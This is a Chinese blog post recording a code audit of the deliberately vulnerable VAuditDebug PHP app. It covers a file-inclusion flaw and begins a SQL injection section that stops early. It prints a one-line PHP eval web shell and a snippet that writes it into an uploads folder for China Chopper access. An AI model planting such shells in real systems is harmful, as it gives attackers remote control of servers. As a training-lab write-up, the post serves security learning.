VAudit代码审计从0到1,思路记录

本文详细记录了一次对VAuditDebug版本的代码审计过程,包括使用Seay工具发现49个疑似漏洞,重点分析了文件包含漏洞、SQL注入、XSS攻击等,并展示了如何利用和修复这些漏洞。通过爆破登录、构造SQL注入payload以及利用文件系统漏洞获取shell,揭示了Web应用安全的重要性。

全方位对VAuditDebug版本进行代码审计和漏洞利用,最后修复,主要记录审计过程和思路,此博客会持续更新。

day1

先使用Seay代码审计工具进行扫描,共发现49个疑似漏洞,逐一对漏洞进行分析。

ID1

根据提示疑似文件包含漏洞,查看页面源代码发现该页面存在参数'module',如果没有进行传递便正常显示,如果传递则引用该参数。看到这里就感觉妥了,尽管它对引用参数进行限制但include函数在进行文件包含时会把所有文件均当做PHP文件进行解析。

 我们尝试直接在本地服务器创建shell.inc文件,使用文件包含访问本地服务器getshell。shell.inc代码如下

<?php eval($_POST['code']) ?>

见证奇迹,访问成功,接下来了向服务器写入木马文件

<?php 
$fp=fopen('uploads/shell.php','w');
fwrite($fp,'<?php eval($_POST['code']); ?>');
fclose($fp);
?>

到了这一步直接上中国菜刀,轻松连接上,而我们知道sys和upload文件夹是拥有写入权限的,理论上可以为所欲为了

 ID2

根据提示找到messageDetail.php,查看源代码,有是个不得了的发现,简单查找发现这是留言的详情页面,而且未对用户输入的ID字段做检测,但通过sqlwaf函数进行了替换,既然没做检测我们绕过他

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值